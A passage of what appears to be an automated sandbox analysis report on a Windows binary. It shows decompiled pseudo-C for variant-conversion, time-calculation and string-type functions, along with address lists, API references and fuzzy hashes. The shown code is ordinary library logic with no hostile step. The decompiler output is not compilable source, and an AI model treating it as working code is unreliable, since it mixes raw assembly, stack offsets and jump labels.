					E0041163F( *((intOrPtr*)(_t327 + 8)), _t327 - 0x40);
					__imp__#9(_t327 - 0x40);
				} else {
					_t167 =  *(_t327 - 0x26) & 0x0000ffff;
					_t326 = __imp__#9;
					__eflags = _t167 - 0x81;
					if(__eflags > 0) {
						_t168 = _t167 - 0x82;
						__eflags = _t168;
						if(__eflags == 0) {
							goto L47;
						} else {
							_t181 = _t168 - 1;
							__eflags = _t181;
							if(__eflags == 0) {
								_t183 = E0040DA18(_t321, __eflags,  *((intOrPtr*)(_t327 + 0xc)), _t327 - 0x24);
								__eflags = _t183;
								if(_t183 != 0) {
									__eflags =  *(_t327 - 0x23);
									asm("fild qword [ebp-0x21]");
									if( *(_t327 - 0x23) > 0) {
										do {
											_t129 = _t327 - 0x23;
											 *_t129 =  *(_t327 - 0x23) - 1;
											__eflags =  *_t129;
											_t335 = _t335 *  *0x44b030;
										} while ( *_t129 != 0);
									}
									__eflags =  *(_t327 - 0x22);
									if( *(_t327 - 0x22) == 0) {
										_t335 = st0;
										asm("fchs");
										st1 = _t335;
									}
									 *(_t327 - 0x78) = _t335;
									 *((short*)(_t327 - 0x80)) = 5;
									 *((char*)(_t327 - 4)) = 0xe;
									E00411612(_t327 - 0x80, _t327 - 0x40, _t327 - 0x80);
									_t186 = _t327 - 0x80;
									goto L36;
								}
							} else {
								_t189 = _t181;
								__eflags = _t189;
								if(__eflags == 0) {
									_t191 = E0040DA42(_t321, __eflags,  *((intOrPtr*)(_t327 + 0xc)), _t327 - 0x30);
									__eflags = _t191;
									if(_t191 != 0) {
										asm("fldz");
										 *(_t327 - 0x20) = _t335;
										 *((intOrPtr*)(_t327 - 0x18)) = 0;
										E0040C8D0(_t327 - 0x20,  *(_t327 - 0x30),  *(_t327 - 0x2e) & 0x0000ffff,  *(_t327 - 0x2c) & 0x0000ffff, 0, 0, 0);
										 *((short*)(_t327 - 0x70)) = 7;
										 *(_t327 - 0x68) =  *(_t327 - 0x20);
										 *((char*)(_t327 - 4)) = 0xf;
										E00411612(_t327 - 0x70, _t327 - 0x40, _t327 - 0x70);
										_t186 = _t327 - 0x70;
										goto L36;
									}
								} else {
									_t196 = _t189 - 1;
									__eflags = _t196;
									if(__eflags == 0) {
										_t198 = E0040DA42(_t321, __eflags,  *((intOrPtr*)(_t327 + 0xc)), _t327 - 0x30);
										__eflags = _t198;
										if(_t198 != 0) {
											asm("fldz");
											 *(_t327 - 0x20) = _t335;
											 *((intOrPtr*)(_t327 - 0x18)) = 0;
											E0040C931( *(_t327 - 0x30) & 0x0000ffff,  *(_t327 - 0x2e) & 0x0000ffff,  *(_t327 - 0x2c) & 0x0000ffff);
											 *((short*)(_t327 - 0xb0)) = 7;
											 *(_t327 - 0xa8) =  *(_t327 - 0x20);
											 *((char*)(_t327 - 4)) = 0x10;
											E00411612(_t327 - 0xb0, _t327 - 0x40, _t327 - 0xb0);
											_t186 = _t327 - 0xb0;
											goto L36;
										}
									} else {
										__eflags = _t196 - 1;
										if(__eflags == 0) {
											_t207 = E0040DA6C(_t321, __eflags,  *((intOrPtr*)(_t327 + 0xc)), _t327 - 0x24);
											__eflags = _t207;
											if(_t207 != 0) {
												_t214 = E0040DC02(_t327 - 0x13c,  *((short*)(_t327 - 0x24)),  *(_t327 - 0x22) & 0x0000ffff,  *(_t327 - 0x20) & 0x0000ffff,  *(_t327 - 0x1e) & 0x0000ffff,  *(_t327 - 0x1c) & 0x0000ffff,  *(_t327 - 0x1a) & 0x0000ffff);
												 *((short*)(_t327 - 0xa0)) = 7;
												 *((long long*)(_t327 - 0x98)) =  *_t214;
												 *((char*)(_t327 - 4)) = 0x11;
												E00411612(_t327 - 0xa0, _t327 - 0x40, _t327 - 0xa0);
												_t186 = _t327 - 0xa0;
												goto L36;
											}
										}
									}
								}
							}
						}
					} else {
						if(__eflags == 0) {
							_t218 = E0040830B(_t327 + 0xc, __eflags);
							 *((char*)(_t327 - 4)) = 2;
							_t220 = E0041165F(_t327 - 0x120,  *_t218, 8);
							 *((char*)(_t327 - 4)) = 3;
							E00411612(_t220, _t327 - 0x40, _t220);
							 *_t326(_t327 - 0x120, E0040C9C0(_t321, __eflags,  *((intOrPtr*)(_t327 + 0xc))));
							_t276 =  *((intOrPtr*)(_t327 + 0xc));
							goto L48;
						} else {
							__eflags = _t167 - 8;
							if(__eflags > 0) {
								__eflags = _t167 - 0xb;
								if(__eflags == 0) {
									_t226 = E0041155B(_t327 - 0x100,  *((short*)(E0040C9C0(_t321, __eflags,  *((intOrPtr*)(_t327 + 0xc))))), 0xb);
									 *((char*)(_t327 - 4)) = 0xb;
									E00411612(_t226, _t327 - 0x40, _t226);
									_t186 = _t327 - 0x100;
									goto L36;
								} else {
									__eflags = _t167 - 0xc;
									if(__eflags == 0) {
										_t229 = E0041163F(_t327 - 0xf0, E0040C9C0(_t321, __eflags,  *((intOrPtr*)(_t327 + 0xc))));
										 *((char*)(_t327 - 4)) = 1;
										E00411612(_t229, _t327 - 0x40, _t229);
										_t186 = _t327 - 0xf0;
										goto L36;
									} else {
										__eflags = _t167 - 0xf;
										if(_t167 > 0xf) {
											__eflags = _t167 - 0x11;
											if(__eflags <= 0) {
												_t231 = E0040C9C0(_t321, __eflags,  *((intOrPtr*)(_t327 + 0xc)));
												 *((short*)(_t327 - 0x60)) = 0x11;
												 *((char*)(_t327 - 0x58)) =  *_t231;
												 *((char*)(_t327 - 4)) = 6;
												E00411612(_t327 - 0x60, _t327 - 0x40, _t327 - 0x60);
												_t186 = _t327 - 0x60;
												goto L36;
											} else {
												__eflags = _t167 - 0x12;
												if(__eflags == 0) {
													goto L24;
												} else {
													__eflags = _t167 - 0x13;
													if(__eflags == 0) {
														goto L23;
													}
												}
											}
										}
									}
								}
							} else {
								if(__eflags == 0) {
									L47:
									_t170 = E0040FB03(_t327 - 0x28, __eflags);
									 *((char*)(_t327 - 4)) = 4;
									_t172 = E0041165F(_t327 - 0x130,  *_t170, 8);
									 *((char*)(_t327 - 4)) = 5;
									E00411612(_t172, _t327 - 0x40, _t172);
									 *_t326(_t327 - 0x130, E0040C9C0(_t321, __eflags,  *((intOrPtr*)(_t327 + 0xc))));
									_t276 =  *((intOrPtr*)(_t327 - 0x28));
									L48:
									__eflags = _t276 + 0xfffffff0;
									 *((char*)(_t327 - 4)) = 0;
									E00401000(_t276 + 0xfffffff0, _t318);
								} else {
									_t243 = _t167;
									__eflags = _t243;
									if(__eflags == 0) {
										L24:
										_t237 = E0041155B(_t327 - 0x110,  *((short*)(E0040C9C0(_t321, __eflags,  *((intOrPtr*)(_t327 + 0xc))))), 2);
										 *((char*)(_t327 - 4)) = 7;
										E00411612(_t237, _t327 - 0x40, _t237);
										_t186 = _t327 - 0x110;
										goto L36;
									} else {
										_t244 = _t243 - 1;
										__eflags = _t244;
										if(__eflags == 0) {
											L23:
											_t240 = E00411582(_t327 - 0xe0,  *((intOrPtr*)(E0040C9C0(_t321, __eflags,  *((intOrPtr*)(_t327 + 0xc))))), 3);
											 *((char*)(_t327 - 4)) = 8;
											E00411612(_t240, _t327 - 0x40, _t240);
											_t186 = _t327 - 0xe0;
											goto L36;
										} else {
											_t245 = _t244 - 1;
											__eflags = _t245;
											if(__eflags == 0) {
												 *((intOrPtr*)(_t327 - 0xb8)) =  *((intOrPtr*)(E0040C9C0(_t321, __eflags,  *((intOrPtr*)(_t327 + 0xc)))));
												 *((short*)(_t327 - 0xc0)) = 4;
												 *((char*)(_t327 - 4)) = 9;
												E00411612(_t327 - 0xc0, _t327 - 0x40, _t327 - 0xc0);
												_t186 = _t327 - 0xc0;
												goto L36;
											} else {
												_t249 = _t245 - 1;
												__eflags = _t249;
												if(__eflags == 0) {
													 *((long long*)(_t327 - 0x88)) =  *((long long*)(E0040C9C0(_t321, __eflags,  *((intOrPtr*)(_t327 + 0xc)))));
													 *((short*)(_t327 - 0x90)) = 5;
													 *((char*)(_t327 - 4)) = 0xa;
													E00411612(_t327 - 0x90, _t327 - 0x40, _t327 - 0x90);
													_t186 = _t327 - 0x90;
													goto L36;
												} else {
													_t253 = _t249 - 1;
													__eflags = _t253;
													if(__eflags == 0) {
														_t254 = E0040C9C0(_t321, __eflags,  *((intOrPtr*)(_t327 + 0xc)));
														 *((short*)(_t327 - 0x50)) = 6;
														 *((intOrPtr*)(_t327 - 0x48)) =  *_t254;
														 *((intOrPtr*)(_t327 - 0x44)) =  *((intOrPtr*)(_t254 + 4));
														 *((char*)(_t327 - 4)) = 0xd;
														E00411612(_t327 - 0x50, _t327 - 0x40, _t327 - 0x50);
														_t186 = _t327 - 0x50;
														goto L36;
													} else {
														__eflags = _t253 - 1;
														if(__eflags == 0) {
															 *((long long*)(_t327 - 0xc8)) =  *((long long*)(E0040C9C0(_t321, __eflags,  *((intOrPtr*)(_t327 + 0xc)))));
															 *((short*)(_t327 - 0xd0)) = 7;
															 *((char*)(_t327 - 4)) = 0xc;
															E00411612(_t327 - 0xd0, _t327 - 0x40, _t327 - 0xd0);
															_t186 = _t327 - 0xd0;
															L36:
															 *((char*)(_t327 - 4)) = 0;
															 *_t326(_t186);
														}
													}
												}
											}
										}
									}
								}
							}
						}
					}
					E0041163F( *((intOrPtr*)(_t327 + 8)), _t327 - 0x40);
					 *_t326(_t327 - 0x40);
				}
				 *[fs:0x0] =  *((intOrPtr*)(_t327 - 0xc));
				return E00412FBB( *((intOrPtr*)(_t327 + 8)),  *((intOrPtr*)(_t327 - 0x10)));
			}



































                                                                              0x00410097
                                                                              0x0041009c
                                                                              0x004100a7
                                                                              0x004100ae
                                                                              0x004100ba
                                                                              0x004100bd
                                                                              0x004100c2
                                                                              0x004100ce
                                                                              0x004100d1
                                                                              0x004100d6
                                                                              0x004100da
                                                                              0x004100f5
                                                                              0x004100fe
                                                                              0x00410109
                                                                              0x00410109
                                                                              0x0041010d
                                                                              0x00410118
                                                                              0x0041011a
                                                                              0x0041039b
                                                                              0x0041039b
                                                                              0x004103a0
                                                                              0x00000000
                                                                              0x004103a6
                                                                              0x004103a6
                                                                              0x004103a6
                                                                              0x004103a7
                                                                              0x004104fa
                                                                              0x004104ff
                                                                              0x00410501
                                                                              0x00410507
                                                                              0x0041050a
                                                                              0x0041050d
                                                                              0x0041050f
                                                                              0x0041050f
                                                                              0x0041050f
                                                                              0x0041050f
                                                                              0x00410512
                                                                              0x00410512
                                                                              0x0041050f
                                                                              0x0041051a
                                                                              0x0041051d
                                                                              0x0041051f
                                                                              0x00410521
                                                                              0x00410523
                                                                              0x00410523
                                                                              0x00410525
                                                                              0x00410528
                                                                              0x00410535
                                                                              0x00410539
                                                                              0x0041053e
                                                                              0x00000000
                                                                              0x0041053e
                                                                              0x004103ad
                                                                              0x004103ae
                                                                              0x004103ae
                                                                              0x004103af
                                                                              0x0041049e
                                                                              0x004104a3
                                                                              0x004104a5
                                                                              0x004104af
                                                                              0x004104b5
                                                                              0x004104c5
                                                                              0x004104c8
                                                                              0x004104cd
                                                                              0x004104d6
                                                                              0x004104e0
                                                                              0x004104e4
                                                                              0x004104e9
                                                                              0x00000000
                                                                              0x004104e9
                                                                              0x004103b5
                                                                              0x004103b5
                                                                              0x004103b5
                                                                              0x004103b6
                                                                              0x0041043c
                                                                              0x00410441
                                                                              0x00410443
                                                                              0x0041044d
                                                                              0x00410450
                                                                              0x00410460
                                                                              0x00410463
                                                                              0x00410468
                                                                              0x00410474
                                                                              0x00410484
                                                                              0x00410488
                                                                              0x0041048d
                                                                              0x00000000
                                                                              0x0041048d
                                                                              0x004103b8
                                                                              0x004103b8
                                                                              0x004103b9
                                                                              0x004103c8
                                                                              0x004103cd
                                                                              0x004103cf
                                                                              0x004103f9
                                                                              0x004103fe
                                                                              0x00410409
                                                                              0x00410419
                                                                              0x0041041d
                                                                              0x00410422
                                                                              0x00000000
                                                                              0x00410422
                                                                              0x004103cf
                                                                              0x004103b9
                                                                              0x004103b6
                                                                              0x004103af
                                                                              0x004103a7
                                                                              0x00410120
                                                                              0x00410120
                                                                              0x00410364
                                                                              0x00410374
                                                                              0x00410378
                                                                              0x00410381
                                                                              0x00410385
                                                                              0x00410391
                                                                              0x00410393
                                                                              0x00000000
                                                                              0x00410126
                                                                              0x00410126
                                                                              0x00410129
                                                                              0x00410236
                                                                              0x00410239
                                                                              0x00410339
                                                                              0x00410342
                                                                              0x00410346
                                                                              0x0041034b
                                                                              0x00000000
                                                                              0x0041023f
                                                                              0x0041023f
                                                                              0x00410242
                                                                              0x00410306
                                                                              0x0041030f
                                                                              0x00410313
                                                                              0x00410318
                                                                              0x00000000
                                                                              0x00410248
                                                                              0x00410248
                                                                              0x0041024b
                                                                              0x00410251
                                                                              0x00410254
                                                                              0x004102cd
                                                                              0x004102d4
                                                                              0x004102da
                                                                              0x004102e4
                                                                              0x004102e8
                                                                              0x004102ed
                                                                              0x00000000
                                                                              0x00410256
                                                                              0x00410256
                                                                              0x00410259
                                                                              0x00000000
                                                                              0x0041025b
                                                                              0x0041025b
                                                                              0x0041025e
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x0041025e
                                                                              0x00410259
                                                                              0x00410254
                                                                              0x0041024b
                                                                              0x00410242
                                                                              0x0041012f
                                                                              0x0041012f
                                                                              0x00410546
                                                                              0x00410554
                                                                              0x00410564
                                                                              0x00410568
                                                                              0x00410571
                                                                              0x00410575
                                                                              0x00410581
                                                                              0x00410583
                                                                              0x00410586
                                                                              0x00410586
                                                                              0x00410589
                                                                              0x0041058c
                                                                              0x00410135
                                                                              0x00410136
                                                                              0x00410136
                                                                              0x00410137
                                                                              0x00410295
                                                                              0x004102ab
                                                                              0x004102b4
                                                                              0x004102b8
                                                                              0x004102bd
                                                                              0x00000000
                                                                              0x0041013d
                                                                              0x0041013d
                                                                              0x0041013d
                                                                              0x0041013e
                                                                              0x00410264
                                                                              0x00410278
                                                                              0x00410281
                                                                              0x00410285
                                                                              0x0041028a
                                                                              0x00000000
                                                                              0x00410144
                                                                              0x00410144
                                                                              0x00410144
                                                                              0x00410145
                                                                              0x00410209
                                                                              0x0041020f
                                                                              0x00410222
                                                                              0x00410226
                                                                              0x0041022b
                                                                              0x00000000
                                                                              0x0041014b
                                                                              0x0041014b
                                                                              0x0041014b
                                                                              0x0041014c
                                                                              0x004101d0
                                                                              0x004101d6
                                                                              0x004101e9
                                                                              0x004101ed
                                                                              0x004101f2
                                                                              0x00000000
                                                                              0x0041014e
                                                                              0x0041014e
                                                                              0x0041014e
                                                                              0x0041014f
                                                                              0x00410196
                                                                              0x004101a0
                                                                              0x004101a6
                                                                              0x004101a9
                                                                              0x004101b3
                                                                              0x004101b7
                                                                              0x004101bc
                                                                              0x00000000
                                                                              0x00410151
                                                                              0x00410151
                                                                              0x00410152
                                                                              0x00410164
                                                                              0x0041016a
                                                                              0x0041017d
                                                                              0x00410181
                                                                              0x00410186
                                                                              0x00410428
                                                                              0x00410429
                                                                              0x0041042c
                                                                              0x0041042c
                                                                              0x00410152
                                                                              0x0041014f
                                                                              0x0041014c
                                                                              0x00410145
                                                                              0x0041013e
                                                                              0x00410137
                                                                              0x0041012f
                                                                              0x00410129
                                                                              0x00410120
                                                                              0x00410598
                                                                              0x004105a1
                                                                              0x004105a1
                                                                              0x004105ab
                                                                              0x004105bc

                                                                              APIs
                                                                              • __EH_prolog.LIBCMT ref: 0041009C
                                                                              • VariantClear.OLEAUT32(?), ref: 004100FE
                                                                              • VariantClear.OLEAUT32(00000007), ref: 0041042C
                                                                              • VariantClear.OLEAUT32(?), ref: 004105A1
                                                                                • Part of subcall function 00411612: VariantCopy.OLEAUT32(?,?), ref: 0041161A
                                                                                • Part of subcall function 0040C8D0: SystemTimeToVariantTime.OLEAUT32(?), ref: 0040C91E
                                                                              • VariantClear.OLEAUT32(?), ref: 00410581
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.232065962.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000002.00000002.232033886.0000000000400000.00000002.00020000.sdmp Download File
                                                                              • Associated: 00000002.00000002.232256010.0000000000432000.00000002.00020000.sdmp Download File
                                                                              • Associated: 00000002.00000002.232336850.0000000000456000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000002.00000002.232366609.000000000045A000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000002.00000002.232381898.000000000045C000.00000002.00020000.sdmp Download File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_400000_lK8vF3n2e7.jbxd
                                                                              Similarity
                                                                              • API ID: Variant$Clear$Time$CopyH_prologSystem
                                                                              • String ID:
                                                                              • API String ID: 2075586698-0
                                                                              • Opcode ID: 605e1c9f83e75445cd3245e7be9d30b8c5f4e15b5cd69c8d251bbf80b7a2f1e9
                                                                              • Instruction ID: 296da0157ccbdd0a806008ceeefc9c7c9cc0745809533a2ac8276533d41b2ddb
                                                                              • Opcode Fuzzy Hash: 605e1c9f83e75445cd3245e7be9d30b8c5f4e15b5cd69c8d251bbf80b7a2f1e9
                                                                              • Instruction Fuzzy Hash: ADE15E7190011CEACF15EB94C894AFEB779BF48304F04409FF946B7291DB789A89DB29
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 004144DC, Relevance: 9.2, APIs: 6, Instructions: 197COMMON
                                                                              Download Yara Rule
                                                                              C-Code - Quality: 80%
                                                                              			E004144DC(void* __ecx, intOrPtr __edx, intOrPtr* _a4) {
				intOrPtr _v8;
				char _v12;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				intOrPtr _t62;
				intOrPtr* _t63;
				intOrPtr* _t65;
				intOrPtr _t67;
				intOrPtr _t68;
				void* _t69;
				intOrPtr _t71;
				void* _t72;
				intOrPtr _t74;
				char _t75;
				intOrPtr _t79;
				intOrPtr _t85;
				intOrPtr _t86;
				intOrPtr _t90;
				intOrPtr* _t92;
				intOrPtr _t94;
				intOrPtr _t101;
				intOrPtr _t102;
				char _t105;
				signed int _t111;
				intOrPtr _t113;
				intOrPtr _t118;
				intOrPtr* _t121;
				void* _t127;
				intOrPtr _t128;
				intOrPtr* _t129;
				intOrPtr _t132;
				void* _t134;
				intOrPtr _t136;
				intOrPtr _t138;

				_t118 = __edx;
				_t121 = _a4;
				_t101 =  *((intOrPtr*)(_t121 + 4));
				_t62 =  *_t121;
				_t132 = _t101;
				if(_t132 < 0 || _t132 <= 0 && _t62 < 0) {
					L29:
					_t63 = 0;
					__eflags = 0;
					goto L30;
				} else {
					_t134 = _t101 - 0x1000;
					if(_t134 > 0) {
						goto L29;
					}
					if(_t134 < 0) {
						L6:
						_push(_t127);
						E0041AB3B(_t127, _t135);
						_t102 =  *((intOrPtr*)(_t121 + 4));
						_t136 = _t102;
						_t128 =  *_t121;
						if(_t136 < 0 || _t136 <= 0 && _t128 <= 0x3f480) {
							_t65 = E0041A32F(_t121);
							__eflags =  *0x4578ac; // 0x1
							_t129 = _t65;
							if(__eflags == 0) {
								L15:
								asm("cdq");
								_t67 =  *0x4578a8; // 0x7080
								_t123 = _t118;
								asm("cdq");
								_t105 =  *_t129 - _t67;
								__eflags = _t105;
								asm("sbb edi, edx");
								_v12 = _t105;
								_v8 = _t118;
								L16:
								_t68 = E0041ABD0(_t105, _t123, 0x3c, 0);
								__eflags = _t68;
								 *_t129 = _t68;
								if(_t68 < 0) {
									 *_t129 = _t68 + 0x3c;
									_v12 = _v12 + 0xffffffc4;
									asm("adc dword [ebp-0x4], 0xffffffff");
								}
								_t69 = E00414150(_v12, _v8, 0x3c, 0);
								asm("cdq");
								asm("adc edi, edx");
								_v12 = _t69 +  *((intOrPtr*)(_t129 + 4));
								_v8 = _t118;
								_t71 = E0041ABD0(_t69 +  *((intOrPtr*)(_t129 + 4)), _t118, 0x3c, 0);
								__eflags = _t71;
								 *((intOrPtr*)(_t129 + 4)) = _t71;
								if(_t71 < 0) {
									 *((intOrPtr*)(_t129 + 4)) = _t71 + 0x3c;
									_v12 = _v12 + 0xffffffc4;
									asm("adc dword [ebp-0x4], 0xffffffff");
								}
								_t72 = E00414150(_v12, _v8, 0x3c, 0);
								asm("cdq");
								asm("adc edi, edx");
								_v12 = _t72 +  *((intOrPtr*)(_t129 + 8));
								_v8 = _t118;
								_t74 = E0041ABD0(_t72 +  *((intOrPtr*)(_t129 + 8)), _t118, 0x18, 0);
								__eflags = _t74;
								 *((intOrPtr*)(_t129 + 8)) = _t74;
								if(_t74 < 0) {
									 *((intOrPtr*)(_t129 + 8)) = _t74 + 0x18;
									_v12 = _v12 + 0xffffffe8;
									asm("adc dword [ebp-0x4], 0xffffffff");
								}
								_t75 = E00414150(_v12, _v8, 0x18, 0);
								__eflags = _t118;
								_v12 = _t75;
								_v8 = _t118;
								if(__eflags > 0) {
									goto L28;
								} else {
									if(__eflags < 0) {
										L25:
										asm("cdq");
										_t111 = 7;
										 *(_t129 + 0x18) = ( *(_t129 + 0x18) + _t75 + 7) % _t111;
										 *((intOrPtr*)(_t129 + 0xc)) =  *((intOrPtr*)(_t129 + 0xc)) + _v12;
										_t79 =  *((intOrPtr*)(_t129 + 0xc));
										__eflags = _t79;
										if(_t79 > 0) {
											_t60 = _t129 + 0x1c;
											 *_t60 =  *((intOrPtr*)(_t129 + 0x1c)) + _v12;
											__eflags =  *_t60;
										} else {
											 *((intOrPtr*)(_t129 + 0x14)) =  *((intOrPtr*)(_t129 + 0x14)) - 1;
											 *((intOrPtr*)(_t129 + 0xc)) = _t79 + 0x1f;
											 *((intOrPtr*)(_t129 + 0x1c)) = 0x16c;
											 *((intOrPtr*)(_t129 + 0x10)) = 0xb;
										}
										goto L28;
									}
									__eflags = _t75;
									if(_t75 >= 0) {
										goto L28;
									}
									goto L25;
								}
							}
							_push(_t129);
							_t85 = E0041AB87(0, _t121, _t129, __eflags);
							__eflags = _t85;
							if(_t85 == 0) {
								goto L15;
							}
							_t113 =  *0x4578b0; // 0xfffff1f0
							_t86 =  *0x4578a8; // 0x7080
							asm("cdq");
							asm("cdq");
							asm("sbb edx, edi");
							_v12 =  *_t129 - _t86 + _t113;
							_v8 = _t118;
							 *((intOrPtr*)(_t129 + 0x20)) = 1;
							_t123 = _v8;
							_t105 = _v12;
							goto L16;
						} else {
							_t90 =  *0x4578a8; // 0x7080
							asm("cdq");
							asm("sbb ecx, edx");
							_v12 = _t128 - _t90;
							_v8 = _t102;
							_t92 = E0041A32F( &_v12);
							_t138 =  *0x4578ac; // 0x1
							_t129 = _t92;
							if(_t138 != 0) {
								_push(_t129);
								if(E0041AB87(0, _t121, _t129, _t138) != 0) {
									_t94 =  *0x4578b0; // 0xfffff1f0
									asm("cdq");
									_v12 = _v12 - _t94;
									asm("sbb [ebp-0x4], edx");
									_t129 = E0041A32F( &_v12);
									 *((intOrPtr*)(_t129 + 0x20)) = 1;
								}
							}
							L28:
							_t63 = _t129;
							L30:
							return _t63;
						}
					}
					_t135 = _t62;
					if(_t62 > 0) {
						goto L29;
					}
					goto L6;
				}
			}







































                                                                              0x004144dc
                                                                              0x004144e3
                                                                              0x004144e6
                                                                              0x004144e9
                                                                              0x004144ed
                                                                              0x004144ef
                                                                              0x004146e4
                                                                              0x004146e4
                                                                              0x004146e4
                                                                              0x00000000
                                                                              0x004144ff
                                                                              0x004144ff
                                                                              0x00414505
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x0041450b
                                                                              0x00414515
                                                                              0x00414515
                                                                              0x00414516
                                                                              0x0041451b
                                                                              0x0041451e
                                                                              0x00414520
                                                                              0x00414522
                                                                              0x0041458a
                                                                              0x0041458f
                                                                              0x00414596
                                                                              0x00414598
                                                                              0x004145d3
                                                                              0x004145d5
                                                                              0x004145d8
                                                                              0x004145dd
                                                                              0x004145df
                                                                              0x004145e0
                                                                              0x004145e0
                                                                              0x004145e2
                                                                              0x004145e4
                                                                              0x004145e7
                                                                              0x004145ea
                                                                              0x004145ef
                                                                              0x004145f4
                                                                              0x004145f6
                                                                              0x004145f8
                                                                              0x004145fd
                                                                              0x004145ff
                                                                              0x00414603
                                                                              0x00414603
                                                                              0x00414610
                                                                              0x0041461c
                                                                              0x00414620
                                                                              0x00414626
                                                                              0x00414629
                                                                              0x0041462c
                                                                              0x00414631
                                                                              0x00414633
                                                                              0x00414636
                                                                              0x0041463b
                                                                              0x0041463e
                                                                              0x00414642
                                                                              0x00414642
                                                                              0x0041464f
                                                                              0x0041465b
                                                                              0x0041465f
                                                                              0x00414665
                                                                              0x00414668
                                                                              0x0041466b
                                                                              0x00414670
                                                                              0x00414672
                                                                              0x00414675
                                                                              0x0041467a
                                                                              0x0041467d
                                                                              0x00414681
                                                                              0x00414681
                                                                              0x0041468e
                                                                              0x00414693
                                                                              0x00414695
                                                                              0x00414698
                                                                              0x0041469b
                                                                              0x00000000
                                                                              0x0041469d
                                                                              0x0041469d
                                                                              0x004146a3
                                                                              0x004146aa
                                                                              0x004146ad
                                                                              0x004146b0
                                                                              0x004146b6
                                                                              0x004146b9
                                                                              0x004146bc
                                                                              0x004146be
                                                                              0x004146dc
                                                                              0x004146dc
                                                                              0x004146dc
                                                                              0x004146c0
                                                                              0x004146c3
                                                                              0x004146c6
                                                                              0x004146c9
                                                                              0x004146d0
                                                                              0x004146d0
                                                                              0x00000000
                                                                              0x004146be
                                                                              0x0041469f
                                                                              0x004146a1
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x004146a1
                                                                              0x0041469b
                                                                              0x0041459a
                                                                              0x0041459b
                                                                              0x004145a0
                                                                              0x004145a3
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x004145a5
                                                                              0x004145ab
                                                                              0x004145b2
                                                                              0x004145b9
                                                                              0x004145bc
                                                                              0x004145be
                                                                              0x004145c1
                                                                              0x004145c4
                                                                              0x004145cb
                                                                              0x004145ce
                                                                              0x00000000
                                                                              0x0041452e
                                                                              0x0041452e
                                                                              0x00414533
                                                                              0x00414539
                                                                              0x0041453c
                                                                              0x0041453f
                                                                              0x00414542
                                                                              0x00414547
                                                                              0x0041454e
                                                                              0x00414550
                                                                              0x00414556
                                                                              0x0041455f
                                                                              0x00414565
                                                                              0x0041456a
                                                                              0x0041456b
                                                                              0x00414572
                                                                              0x0041457a
                                                                              0x0041457d
                                                                              0x0041457d
                                                                              0x0041455f
                                                                              0x004146df
                                                                              0x004146df
                                                                              0x004146e6
                                                                              0x004146e9
                                                                              0x004146e9
                                                                              0x00414522
                                                                              0x0041450d
                                                                              0x0041450f
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x0041450f

                                                                              APIs
                                                                                • Part of subcall function 0041A32F: __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0041A3A1
                                                                              • __allrem.LIBCMT ref: 004145EF
                                                                              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00414610
                                                                              • __allrem.LIBCMT ref: 0041462C
                                                                              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0041464F
                                                                              • __allrem.LIBCMT ref: 0041466B
                                                                              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0041468E
                                                                                • Part of subcall function 0041AB87: __lock.LIBCMT ref: 0041AB95
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.232065962.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000002.00000002.232033886.0000000000400000.00000002.00020000.sdmp Download File
                                                                              • Associated: 00000002.00000002.232256010.0000000000432000.00000002.00020000.sdmp Download File
                                                                              • Associated: 00000002.00000002.232336850.0000000000456000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000002.00000002.232366609.000000000045A000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000002.00000002.232381898.000000000045C000.00000002.00020000.sdmp Download File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_400000_lK8vF3n2e7.jbxd
                                                                              Similarity
                                                                              • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@$__allrem$__lock
                                                                              • String ID:
                                                                              • API String ID: 1282128132-0
                                                                              • Opcode ID: f24aae5e9ac02b481025052f879efbc357ef8583a21a8847699c1fccd395c587
                                                                              • Instruction ID: 06791d17e37df409e4ad410069e7d1675949318fa0081310cd0c641f4bbc42b9
                                                                              • Opcode Fuzzy Hash: f24aae5e9ac02b481025052f879efbc357ef8583a21a8847699c1fccd395c587
                                                                              • Instruction Fuzzy Hash: 3B61B171A00604AFDB24DF69D8809DEB7F5EF84328B24853FE155E3291D7389E95CB09
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 00419914, Relevance: 9.1, APIs: 6, Instructions: 145COMMONLIBRARYCODE
                                                                              Download Yara Rule
                                                                              C-Code - Quality: 80%
                                                                              			E00419914(void* __ebx, void* __ecx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr _t42;
				void* _t43;
				short* _t45;
				int _t58;
				int _t62;
				long _t65;
				int _t67;
				void* _t69;
				short* _t77;
				short* _t78;
				int _t79;
				short* _t83;
				short* _t84;
				void* _t85;
				short* _t86;
				void* _t91;

				_t69 = __ecx;
				_push(0x1c);
				_push(0x44c670);
				E00412BA4(__ebx, __edi, __esi);
				_t83 = 0;
				_t91 =  *0x45a74c - _t83; // 0x1
				if(_t91 == 0) {
					if(GetStringTypeW(1, 0x44bd1c, 1, _t85 - 0x1c) == 0) {
						_t65 = GetLastError();
						__eflags = _t65 - 0x78;
						if(_t65 == 0x78) {
							 *0x45a74c = 2;
						}
					} else {
						 *0x45a74c = 1;
					}
				}
				_t42 =  *0x45a74c; // 0x1
				if(_t42 == 2 || _t42 == _t83) {
